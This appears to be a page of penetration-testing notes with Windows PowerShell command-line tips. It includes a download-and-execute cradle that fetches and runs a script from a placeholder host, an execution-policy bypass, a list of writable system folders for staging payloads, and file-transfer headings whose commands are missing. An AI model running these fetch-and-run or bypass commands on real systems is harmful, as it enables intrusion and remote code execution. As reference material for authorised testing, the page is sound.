CLI Tips

Powershell

Load Powershell Module Over HTTP

Load Powershell Module Over HTTP:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1');'

Bypass Powershell Execution Policy

If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:

powershell.exe -ExecutionPolicy Bypass

Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine and running a 32-bit Powershell, then some things might not work, such as autologon discovery.

  • Check in powershell:

    • [environment]::Is64BitOperatingSystem

    • [environment]::Is64BitProcess

  • Access 64-bit Powershell at:

    • C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe

    • This path should exist for 32-bit applications even if you can't see it because it is virtual.

    • Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.

View Hidden Files

Running Powershell commands from CMD

You can do it like this, but you need to press enter to get the output.

Writable Folders

Default Writeable Folders:

  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

  • C:\Windows\System32\spool\drivers\color

  • C:\Windows\Tasks

  • C:\Windows\tracing

  • C:\Windows\Temp

  • C:\Users\Public

Transferring Files

LogoTransferring files | Rowbot's PenTest Notesguide.offsecnewbie.com

HTTP Download

Start an HTTP server on your Linux machine:

Download file over HTTP using curl (in case it's installed in Powershell):

Download file using certutil:

FTP Upload

Start an FTP server on your linux machine:

If you don't specify username and password, then you can log in with user anonymous and no password.

PreviousWindowsNextShells

Last updated

Was this helpful?